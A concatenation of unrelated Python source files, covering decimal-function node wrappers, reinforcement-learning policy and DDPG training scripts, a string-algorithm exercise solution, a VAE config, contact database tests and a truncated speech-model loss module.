color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dexp(self.input(0), self.input(1), self.input(2)))
class _Div_Nearest_Node(NodeBase):
"""
Closest integer to a/b, a and b positive integers; rounds to even
in the case of a tie.
"""
title = '_div_nearest'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='a'),
NodeInputBP(label='b'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._div_nearest(self.input(0), self.input(1)))
class _Dlog_Node(NodeBase):
"""
Given integers c, e and p with c > 0, compute an integer
approximation to 10**p * log(c*10**e), with an absolute error of
at most 1. Assumes that c*10**e is not exactly 1."""
title = '_dlog'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='e'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dlog(self.input(0), self.input(1), self.input(2)))
class _Dlog10_Node(NodeBase):
"""
Given integers c, e and p with c > 0, p >= 0, compute an integer
approximation to 10**p * log10(c*10**e), with an absolute error of
at most 1. Assumes that c*10**e is not exactly 1."""
title = '_dlog10'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='e'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dlog10(self.input(0), self.input(1), self.input(2)))
class _Dpower_Node(NodeBase):
"""
Given integers xc, xe, yc and ye representing Decimals x = xc*10**xe and
y = yc*10**ye, compute x**y. Returns a pair of integers (c, e) such that:
10**(p-1) <= c <= 10**p, and
(c-1)*10**e < x**y < (c+1)*10**e
in other words, c*10**e is an approximation to x**y with p digits
of precision, and with an error in c of at most 1. (This is
almost, but not quite, the same as the error being < 1ulp: when c
== 10**(p-1) we can only guarantee error < 10ulp.)
We assume that: x is positive and not equal to 1, and y is nonzero.
"""
title = '_dpower'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='xc'),
NodeInputBP(label='xe'),
NodeInputBP(label='yc'),
NodeInputBP(label='ye'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dpower(self.input(0), self.input(1), self.input(2), self.input(3), self.input(4)))
class _Exact_Half_Node(NodeBase):
"""
Matches zero or more characters at the beginning of the string."""
title = '_exact_half'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='string'),
NodeInputBP(label='pos', dtype=dtypes.Data(default=0, size='s')),
NodeInputBP(label='endpos', dtype=dtypes.Data(default=9223372036854775807, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._exact_half(self.input(0), self.input(1), self.input(2)))
class _Format_Align_Node(NodeBase):
"""
Given an unpadded, non-aligned numeric string 'body' and sign
string 'sign', add padding and alignment conforming to the given
format specifier dictionary 'spec' (as produced by
parse_format_specifier).
"""
title = '_format_align'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='sign'),
NodeInputBP(label='body'),
NodeInputBP(label='spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._format_align(self.input(0), self.input(1), self.input(2)))
class _Format_Number_Node(NodeBase):
"""
Format a number, given the following data:
is_negative: true if the number is negative, else false
intpart: string of digits that must appear before the decimal point
fracpart: string of digits that must come after the point
exp: exponent, as an integer
spec: dictionary resulting from parsing the format specifier
This function uses the information in spec to:
insert separators (decimal separator and thousands separators)
format the sign
format the exponent
add trailing '%' for the '%' type
zero-pad if necessary
fill and align if necessary
"""
title = '_format_number'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='is_negative'),
NodeInputBP(label='intpart'),
NodeInputBP(label='fracpart'),
NodeInputBP(label='exp'),
NodeInputBP(label='spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._format_number(self.input(0), self.input(1), self.input(2), self.input(3), self.input(4)))
class _Format_Sign_Node(NodeBase):
"""
Determine sign character."""
title = '_format_sign'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='is_negative'),
NodeInputBP(label='spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._format_sign(self.input(0), self.input(1)))
class _Group_Lengths_Node(NodeBase):
"""
Convert a localeconv-style grouping into a (possibly infinite)
iterable of integers representing group lengths.
"""
title = '_group_lengths'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='grouping'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._group_lengths(self.input(0)))
class _Iexp_Node(NodeBase):
"""
Given integers x and M, M > 0, such that x/M is small in absolute
value, compute an integer approximation to M*exp(x/M). For 0 <=
x/M <= 2.4, the absolute error in the result is bounded by 60 (and
is usually much smaller)."""
title = '_iexp'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='x'),
NodeInputBP(label='M'),
NodeInputBP(label='L', dtype=dtypes.Data(default=8, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._iexp(self.input(0), self.input(1), self.input(2)))
class _Ilog_Node(NodeBase):
"""
Integer approximation to M*log(x/M), with absolute error boundable
in terms only of x/M.
Given positive integers x and M, return an integer approximation to
M * log(x/M). For L = 8 and 0.1 <= x/M <= 10 the difference
between the approximation and the exact result is at most 22. For
L = 8 and 1.0 <= x/M <= 10.0 the difference is at most 15. In
both cases these are upper bounds on the error; it will usually be
much smaller."""
title = '_ilog'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='x'),
NodeInputBP(label='M'),
NodeInputBP(label='L', dtype=dtypes.Data(default=8, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._ilog(self.input(0), self.input(1), self.input(2)))
class _Insert_Thousands_Sep_Node(NodeBase):
"""
Insert thousands separators into a digit string.
spec is a dictionary whose keys should include 'thousands_sep' and
'grouping'; typically it's the result of parsing the format
specifier using _parse_format_specifier.
The min_width keyword argument gives the minimum length of the
result, which will be padded on the left with zeros if necessary.
If necessary, the zero padding adds an extra '0' on the left to
avoid a leading thousands separator. For example, inserting
commas every three digits in '123456', with min_width=8, gives
'0,123,456', even though that has length 9.
"""
title = '_insert_thousands_sep'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='digits'),
NodeInputBP(label='spec'),
NodeInputBP(label='min_width', dtype=dtypes.Data(default=1, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._insert_thousands_sep(self.input(0), self.input(1), self.input(2)))
class _Log10_Digits_Node(NodeBase):
"""
Given an integer p >= 0, return floor(10**p)*log(10).
For example, self.getdigits(3) returns 2302.
"""
title = '_log10_digits'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._log10_digits(self.input(0)))
class _Log10_Lb_Node(NodeBase):
"""
Compute a lower bound for 100*log10(c) for a positive integer c."""
title = '_log10_lb'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='correction', dtype=dtypes.Data(default={'1': 100, '2': 70, '3': 53, '4': 40, '5': 31, '6': 23, '7': 16, '8': 10, '9': 5}, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._log10_lb(self.input(0), self.input(1)))
class _Namedtuple_Node(NodeBase):
"""
Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
title = '_namedtuple'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='typename'),
NodeInputBP(label='field_names'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._namedtuple(self.input(0), self.input(1)))
class _Nbits_Node(NodeBase):
"""
Number of bits necessary to represent self in binary.
>>> bin(37)
'0b100101'
>>> (37).bit_length()
6"""
title = '_nbits'
type_ = '_pydecimal'
init_inputs = [
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._nbits())
class _Normalize_Node(NodeBase):
"""
Normalizes op1, op2 to have the same exp and length of coefficient.
Done during addition.
"""
title = '_normalize'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='op1'),
NodeInputBP(label='op2'),
NodeInputBP(label='prec', dtype=dtypes.Data(default=0, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._normalize(self.input(0), self.input(1), self.input(2)))
class _Parse_Format_Specifier_Node(NodeBase):
"""
Parse and validate a format specifier.
Turns a standard numeric format specifier into a dict, with the
following entries:
fill: fill character to pad field to minimum width
align: alignment type, either '<', '>', '=' or '^'
sign: either '+', '-' or ' '
minimumwidth: nonnegative integer giving minimum width
zeropad: boolean, indicating whether to pad with zeros
thousands_sep: string to use as thousands separator, or ''
grouping: grouping for thousands separators, in format
used by localeconv
decimal_point: string to use for decimal point
precision: nonnegative integer giving precision, or None
type: one of the characters 'eEfFgG%', or None
"""
title = '_parse_format_specifier'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='format_spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._parse_format_specifier(self.input(0)))
class _Parser_Node(NodeBase):
"""
Matches zero or more characters at the beginning of the string."""
title = '_parser'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='string'),
NodeInputBP(label='pos', dtype=dtypes.Data(default=0, size='s')),
NodeInputBP(label='endpos', dtype=dtypes.Data(default=9223372036854775807, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._parser(self.input(0), self.input(1), self.input(2)))
class _Rshift_Nearest_Node(NodeBase):
"""
Given an integer x and a nonnegative integer shift, return closest
integer to x / 2**shift; use round-to-even in case of a tie.
"""
title = '_rshift_nearest'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='x'),
NodeInputBP(label='shift'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._rshift_nearest(self.input(0), self.input(1)))
class _Sqrt_Nearest_Node(NodeBase):
"""
Closest integer to the square root of the positive integer n. a is
an initial approximation to the square root. Any positive integer
will do for a, but the closer a is to the square root of n the
faster convergence will be.
"""
title = '_sqrt_nearest'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='n'),
NodeInputBP(label='a'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._sqrt_nearest(self.input(0), self.input(1)))
class Getcontext_Node(NodeBase):
"""
Returns this thread's context.
If this thread does not yet have a context, returns
a new context and sets this thread's context.
New contexts are copies of DefaultContext.
"""
title = 'getcontext'
type_ = '_pydecimal'
init_inputs = [
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal.getcontext())
class Localcontext_Node(NodeBase):
"""
Return a context manager for a copy of the supplied context
Uses a copy of the current context if no context is specified
The returned context manager creates a local decimal context
in a with statement:
def sin(x):
with localcontext() as ctx:
ctx.prec += 2
# Rest of sin calculation algorithm
# uses a precision 2 greater than normal
return +s # Convert result to normal precision
def sin(x):
with localcontext(ExtendedContext):
# Rest of sin calculation algorithm
# uses the Extended Context from the
# General Decimal Arithmetic Specification
return +s # Convert result to normal context
>>> setcontext(DefaultContext)
>>> print(getcontext().prec)
28
>>> with localcontext():
... ctx = getcontext()
... ctx.prec += 2
... print(ctx.prec)
...
30
>>> with localcontext(ExtendedContext):
... print(getcontext().prec)
...
9
>>> print(getcontext().prec)
28
"""
title = 'localcontext'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='ctx', dtype=dtypes.Data(default=None, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal.localcontext(self.input(0)))
class Setcontext_Node(NodeBase):
"""
Set this thread's context to context."""
title = 'setcontext'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='context'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal.setcontext(self.input(0)))
export_nodes(
_All_Zeros_Node,
_Convert_For_Comparison_Node,
_Convert_Other_Node,
_Dec_From_Triple_Node,
_Decimal_Lshift_Exact_Node,
_Dexp_Node,
_Div_Nearest_Node,
_Dlog_Node,
_Dlog10_Node,
_Dpower_Node,
_Exact_Half_Node,
_Format_Align_Node,
_Format_Number_Node,
_Format_Sign_Node,
_Group_Lengths_Node,
_Iexp_Node,
_Ilog_Node,
_Insert_Thousands_Sep_Node,
_Log10_Digits_Node,
_Log10_Lb_Node,
_Namedtuple_Node,
_Nbits_Node,
_Normalize_Node,
_Parse_Format_Specifier_Node,
_Parser_Node,
_Rshift_Nearest_Node,
_Sqrt_Nearest_Node,
Getcontext_Node,
Localcontext_Node,
Setcontext_Node,
)
|
pursuit_policy.py | SurvivorT/SRTP | 489 | 11090318 | <filename>pursuit_policy.py
import numpy as np
import tensorflow as tf
from rltools import nn, tfutil
from rltools.distributions import Distribution
from rltools.policy.stochastic import StochasticPolicy
class FactoredCategorical(Distribution):
def __init__(self, dim):
self._dim = dim
@property
def dim(self):
self._dim
def entropy(self, probs_N_H_K):
tmp = -probs_N_H_K * np.log(probs_N_H_K)
tmp[~np.isfinite(tmp)] = 0
return tmp.sum(axis=2)
def sample(self, probs_N_H_K):
"""Sample from N factored categorical distributions"""
N, H, K = probs_N_H_K.shape
return np.array(
[[np.random.choice(K, p=probs_N_H_K[i, j, :]) for j in range(H)] for i in xrange(N)])
def kl_expr(self, logprobs1_B_N_A, logprobs2_B_N_A, name=None):
"""KL divergence between facotored categorical distributions"""
with tf.op_scope([logprobs1_B_N_A, logprobs2_B_N_A], name, 'fac_categorical_kl') as scope:
kl_B = tf.reduce_sum(
tf.reduce_sum(
tf.exp(logprobs1_B_N_A) * (logprobs1_B_N_A - logprobs2_B_N_A), 2), 1,
name=scope)
return kl_B
class PursuitCentralMLPPolicy(StochasticPolicy):
def __init__(self, obsfeat_space, action_space, n_agents, hidden_spec, enable_obsnorm, tblog,
varscope_name):
self.hidden_spec = hidden_spec
self._n_agents = n_agents
self._dist = FactoredCategorical(action_space.n)
super(PursuitCentralMLPPolicy, self).__init__(obsfeat_space, action_space, action_space.n,
enable_obsnorm, tblog, varscope_name)
@property
def distribution(self):
return self._dist
def _make_actiondist_ops(self, obsfeat_B_Df):
with tf.variable_scope('hidden'):
net = nn.FeedforwardNet(obsfeat_B_Df, self.obsfeat_space.shape, self.hidden_spec)
with tf.variable_scope('out'):
out_layer = nn.AffineLayer(net.output, net.output_shape, (self.action_space.n,),
initializer=tf.zeros_initializer)
scores_B_NPa = out_layer.output
scores_B_N_Pa = tf.reshape(scores_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
actiondist_B_N_Pa = scores_B_N_Pa - tfutil.logsumexp(scores_B_N_Pa, axis=2)
actiondist_B_NPa = tf.reshape(actiondist_B_N_Pa, (-1, self.action_space.n))
return actiondist_B_NPa
def _make_actiondist_logprobs_ops(self, actiondist_B_NPa, input_actions_B_N):
actiondist_B_N_Pa = tf.reshape(actiondist_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
logprob_B_N = tfutil.lookup_last_idx(actiondist_B_N_Pa, input_actions_B_N)
return tf.reduce_sum(logprob_B_N, 1) # Product of probabilities
def _make_actiondist_kl_ops(self, proposal_actiondist_B_NPa, actiondist_B_NPa):
proposal_actiondist_B_N_Pa = tf.reshape(proposal_actiondist_B_NPa,
(-1, self._n_agents,
self.action_space.n / self._n_agents))
actiondist_B_N_Pa = tf.reshape(actiondist_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
return self.distribution.kl_expr(proposal_actiondist_B_N_Pa, actiondist_B_N_Pa)
def _sample_from_actiondist(self, actiondist_B_NPa, deterministic=False):
actiondist_B_N_Pa = np.reshape(actiondist_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
probs_B_N_A = np.exp(actiondist_B_N_Pa)
assert probs_B_N_A.ndim == 3
assert probs_B_N_A.shape[2] == self.action_space.n / self._n_agents
if deterministic:
action_B_N = np.argmax(probs_B_N_A, axis=2)
else:
action_B_N = self.distribution.sample(probs_B_N_A)
assert action_B_N.ndim == 2 and action_B_N.shape[-1] == self._n_agents
return action_B_N
def _compute_actiondist_entropy(self, actiondist_B_NPa):
actiondist_B_N_Pa = actiondist_B_NPa.reshape(
(-1, self._n_agents, self.action_space.n / self._n_agents))
return self.distribution.entropy(np.exp(actiondist_B_N_Pa))
|
Greedy Algorithm/ReverseShuffleMerge.py | WinterSoldier13/interview-preparation-kit | 175 | 11090332 | <filename>Greedy Algorithm/ReverseShuffleMerge.py
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
# Complete the reverseShuffleMerge function below.
def reverseShuffleMerge(s):
word = []
freqs = Counter(s)
reqs = { k: v/2 for k, v in freqs.items()} # required letters
avail_skips = { k: v/2 for k, v in freqs.items()} # available skips
skipped = [] # short history of letters that have been skipped
for c in reversed(s):
# No longer need this character so skip
if reqs[c] == 0:
continue
# Skip current character if possible
if avail_skips[c] > 0:
avail_skips[c] -= 1
skipped.append(c) # track history of skipped chars to add back in to the word later
### Can no longer skip current character
## If history of skipped chars is empty then just add the current character
elif len(skipped) == 0:
word.append(c)
## Else add back all skipped characters from cheapest to current letter
else:
i = 0
skipped.append(c)
avail_skips[c] -= 1
min_c = chr(ord('a') - 1)
while i < len(skipped):
# find the cheapest skipped character
i = index_of(skipped, find_min_bounded(skipped, i, min_c), i)
sc = skipped[i]
# if this skipped character (sc) is already fulfilled go to next cheapest
if reqs[sc] == 0:
min_c = sc
continue
# process the current sc
word.append(sc)
reqs[sc] -= 1
avail_skips[sc] += 1
i += 1
# if the sc is at the current character
# we've processed one instance of it making it skippable again ... so break
if sc == c:
break
# clear out all skipped characters that we've already processed
skipped = skipped[i:]
return ''.join(word)
def find_min_bounded(arr, start, min_c):
m = 'z'
for i in range(start, len(arr)):
if arr[i] < m and arr[i] > min_c:
m = arr[i]
return m
def index_of(arr, v, start):
for i in range(start, len(arr)):
if arr[i] == v:
return i
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = reverseShuffleMerge(s)
fptr.write(result + '\n')
fptr.close() |
src/pythae/models/hvae/hvae_config.py | clementchadebec/benchmark_VAE | 143 | 11090345 | <gh_stars>100-1000
from pydantic.dataclasses import dataclass
from ..vae import VAEConfig
@dataclass
class HVAEConfig(VAEConfig):
r"""Hamiltonian Variational Autoencoder config class.
Parameters:
latent_dim (int): The latent dimension used for the latent space. Default: 10
n_lf (int): The number of leapfrog steps to used in the integrator: Default: 3
eps_lf (int): The leapfrog stepsize. Default: 1e-3
beta_zero (int): The tempering factor in the Riemannian Hamiltonian Monte Carlo Sampler.
Default: 0.3
learn_eps_lf (bool): Whether the leapfrog stepsize should be learned. Default: False
learn_beta_zero (bool): Whether the temperature betazero should be learned. Default: False.
"""
n_lf: int = 3
eps_lf: float = 0.001
beta_zero: float = 0.3
learn_eps_lf: bool = False
learn_beta_zero: bool = False
|
Chapter18/train_ddpg.py | haohaoxiao/Deep-Reinforcement-Learning-Hands-On-Second-Edition | 621 | 11090354 | <reponame>haohaoxiao/Deep-Reinforcement-Learning-Hands-On-Second-Edition
#!/usr/bin/env python3
import gym
import gym.wrappers
import ptan
import time
import torch
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import argparse
from tensorboardX import SummaryWriter
import os
from lib import microtaur, ddpg
TIME_LIMIT = 1000
REPLAY_SIZE = 100000
OBS_HISTORY_STEPS = 4
LEARNING_RATE = 1e-4
GAMMA = 0.9
BATCH_SIZE = 64
REPLAY_INITIAL = 10000
TEST_ITERS = 1000
def make_env(reward_scheme: microtaur.RewardScheme, zero_yaw: bool = False):
env = gym.make(microtaur.ENV_ID, reward_scheme=reward_scheme, zero_yaw = zero_yaw)
assert isinstance(env, gym.wrappers.TimeLimit)
env._max_episode_steps = TIME_LIMIT
if OBS_HISTORY_STEPS > 1:
env = ptan.common.wrappers_simple.FrameStack1D(env, OBS_HISTORY_STEPS)
return env
def test_net(net, env, count=10, device="cpu"):
rewards = 0.0
steps = 0
for _ in range(count):
obs = env.reset()
while True:
obs_v = ptan.agent.float32_preprocessor([obs]).to(device)
mu_v = net(obs_v)
action = mu_v.squeeze(dim=0).data.cpu().numpy()
action = np.clip(action, -1, 1)
obs, reward, done, _ = env.step(action)
rewards += reward
steps += 1
if done:
break
return rewards / count, steps / count
if __name__ == "__main__":
microtaur.register()
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--name", required=True, help="Name of the run")
parser.add_argument("--cuda", default=False, action='store_true', help="Use cuda for training")
reward_schemes = [r.name for r in microtaur.RewardScheme]
parser.add_argument("--reward", default='Height', choices=reward_schemes,
help="Reward scheme to use, one of: %s" % reward_schemes)
parser.add_argument("--zero-yaw", default=False, action='store_true', help="Pass zero yaw to observation")
args = parser.parse_args()
device = torch.device("cuda" if args.cuda else "cpu")
save_path = os.path.join("saves", "ddpg-" + args.name)
os.makedirs(save_path, exist_ok=True)
env = make_env(microtaur.RewardScheme[args.reward], zero_yaw=args.zero_yaw)
test_env = make_env(microtaur.RewardScheme[args.reward], zero_yaw=args.zero_yaw)
print("Env: %s, obs=%s, act=%s" % (env, env.observation_space, env.action_space))
act_net = ddpg.DDPGActor(env.observation_space.shape[0], env.action_space.shape[0]).to(device)
crt_net = ddpg.DDPGCritic(env.observation_space.shape[0], env.action_space.shape[0]).to(device)
tgt_act_net = ptan.agent.TargetNet(act_net)
tgt_crt_net = ptan.agent.TargetNet(crt_net)
print("Actor: %s" % act_net)
print("Critic: %s" % crt_net)
writer = SummaryWriter(comment="-ddpg_" + args.name)
agent = ddpg.AgentDDPG(act_net, device=device)
exp_source = ptan.experience.ExperienceSourceFirstLast(env, agent, gamma=GAMMA, steps_count=1)
buffer = ptan.experience.ExperienceReplayBuffer(exp_source, buffer_size=REPLAY_SIZE)
act_opt = optim.Adam(act_net.parameters(), lr=LEARNING_RATE)
crt_opt = optim.Adam(crt_net.parameters(), lr=LEARNING_RATE)
frame_idx = 0
best_reward = None
with ptan.common.utils.RewardTracker(writer) as tracker:
with ptan.common.utils.TBMeanTracker(writer, batch_size=10) as tb_tracker:
while True:
frame_idx += 1
buffer.populate(1)
rewards_steps = exp_source.pop_rewards_steps()
if rewards_steps:
rewards, steps = zip(*rewards_steps)
tb_tracker.track("episode_steps", steps[0], frame_idx)
tracker.reward(rewards[0], frame_idx)
if len(buffer) < REPLAY_INITIAL:
continue
batch = buffer.sample(BATCH_SIZE)
states_v, actions_v, rewards_v, dones_mask, last_states_v = ddpg.unpack_batch_ddpg(batch, device)
# train critic
crt_opt.zero_grad()
q_v = crt_net(states_v, actions_v)
last_act_v = tgt_act_net.target_model(last_states_v)
q_last_v = tgt_crt_net.target_model(last_states_v, last_act_v)
q_last_v[dones_mask] = 0.0
q_ref_v = rewards_v.unsqueeze(dim=-1) + q_last_v * GAMMA
critic_loss_v = F.mse_loss(q_v, q_ref_v.detach())
critic_loss_v.backward()
crt_opt.step()
tb_tracker.track("loss_critic", critic_loss_v, frame_idx)
tb_tracker.track("critic_ref", q_ref_v.mean(), frame_idx)
# train actor
act_opt.zero_grad()
cur_actions_v = act_net(states_v)
actor_loss_v = -crt_net(states_v, cur_actions_v)
actor_loss_v = actor_loss_v.mean()
actor_loss_v.backward()
act_opt.step()
tb_tracker.track("loss_actor", actor_loss_v, frame_idx)
tgt_act_net.alpha_sync(alpha=1 - 1e-3)
tgt_crt_net.alpha_sync(alpha=1 - 1e-3)
if frame_idx % TEST_ITERS == 0:
ts = time.time()
rewards, steps = test_net(act_net, test_env, device=device)
print("Test done in %.2f sec, reward %.3f, steps %d" % (
time.time() - ts, rewards, steps))
writer.add_scalar("test_reward", rewards, frame_idx)
writer.add_scalar("test_steps", steps, frame_idx)
if best_reward is None or best_reward < rewards:
if best_reward is not None:
print("Best reward updated: %.3f -> %.3f" % (best_reward, rewards))
name = "best_%+.3f_%d.dat" % (rewards, frame_idx)
fname = os.path.join(save_path, name)
torch.save(act_net.state_dict(), fname)
best_reward = rewards
|
backend/db/test/contact_test.py | xuantan/viewfinder | 645 | 11090366 | <reponame>xuantan/viewfinder
# -*- coding: utf-8 -*-
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Tests for Contact.
"""
__author__ = '<EMAIL> (<NAME>)'
from viewfinder.backend.base import util
from viewfinder.backend.db import versions
from viewfinder.backend.db.contact import Contact
from viewfinder.backend.db.identity import Identity
from base_test import DBBaseTestCase
class ContactTestCase(DBBaseTestCase):
def testUnlinkIdentity(self):
"""Verify unlinking an identity causes every referencing contact to be updated."""
# Create a Peter contact for Spencer.
timestamp = util.GetCurrentTimestamp()
spencer = self._user
contact_identity = 'Email:<EMAIL>'
contact_name = '<NAME>'
contact_given_name = 'Peter'
contact_family_name = 'Mattis'
contact_rank = 42
contact = Contact.CreateFromKeywords(spencer.user_id,
[(contact_identity, None)],
timestamp,
Contact.GMAIL,
name='<NAME>',
given_name='Peter',
family_name='Mattis',
rank=42)
self._RunAsync(contact.Update, self._client)
peter_ident = self._RunAsync(Identity.Query, self._client, contact_identity, None)
# Unlink peter's identity, which should cause Spencer's contact to be updated.
self._RunAsync(peter_ident.UnlinkIdentity,
self._client,
self._user2.user_id,
contact_identity,
timestamp + 1)
contacts = self._RunAsync(Contact.RangeQuery, self._client, spencer.user_id, None, None, None)
self.assertEqual(len(contacts), 1)
self.assertEqual(contacts[0].sort_key, Contact.CreateSortKey(contact.contact_id, timestamp + 1))
self.assertEqual(contacts[0].name, contact_name)
self.assertEqual(contacts[0].given_name, contact_given_name)
self.assertEqual(contacts[0].family_name, contact_family_name)
self.assertEqual(contacts[0].rank, contact_rank)
def testDerivedAttributes(self):
"""Test that the identity and identities attributes are being properly derived from the
identities_properties attribute.
"""
# Create a Peter contact for Spencer with multiple identical and nearly identical identities.
spencer = self._user
contact_identity_a = 'Email:<EMAIL>'
contact_identity_b = 'Email:<EMAIL>'
contact_identity_c = 'Email:<EMAIL>'
timestamp = util.GetCurrentTimestamp()
contact = Contact.CreateFromKeywords(spencer.user_id,
[(contact_identity_a, None),
(contact_identity_b, 'home'),
(contact_identity_c, 'work')],
timestamp,
Contact.GMAIL,
name='<NAME>',
given_name='Peter',
family_name='Mattis',
rank=42)
self.assertEqual(len(contact.identities_properties), 3)
self.assertEqual(len(contact.identities), 2)
self.assertFalse(contact_identity_a in contact.identities)
self.assertFalse(contact_identity_b in contact.identities)
self.assertFalse(contact_identity_c in contact.identities)
self.assertTrue(Identity.Canonicalize(contact_identity_a) in contact.identities)
self.assertTrue(Identity.Canonicalize(contact_identity_b) in contact.identities)
self.assertTrue(Identity.Canonicalize(contact_identity_c) in contact.identities)
self.assertTrue([contact_identity_a, None] in contact.identities_properties)
self.assertTrue([contact_identity_b, 'home'] in contact.identities_properties)
self.assertTrue([contact_identity_c, 'work'] in contact.identities_properties)
def testUnicodeContactNames(self):
"""Test that contact_id generation works correctly when names include non-ascii characters."""
name = u'ààà朋友你好abc123\U00010000\U00010000\x00\x01\b\n\t '
# The following will assert if there are problems when calculating the hash for the contact_id:
contact_a = Contact.CreateFromKeywords(1,
[('Email:<EMAIL>', None)],
util.GetCurrentTimestamp(),
Contact.GMAIL,
name=name)
contact_b = Contact.CreateFromKeywords(1,
[('Email:<EMAIL>', None)],
util.GetCurrentTimestamp(),
Contact.GMAIL,
name=u'朋' + name[1:])
# Check that making a slight change to a unicode
self.assertNotEqual(contact_a.contact_id, contact_b.contact_id)
|
models/Loss.py | ishine/StyleSpeech-1 | 106 | 11090379 | <reponame>ishine/StyleSpeech-1<filename>models/Loss.py
import torch
import torch.nn as nn
class StyleSpeechLoss(nn.Module):
""" StyleSpeech Loss """
def __init__(self):
super(StyleSpeechLoss, self).__init__()
self.mse_loss = nn.MSELoss()
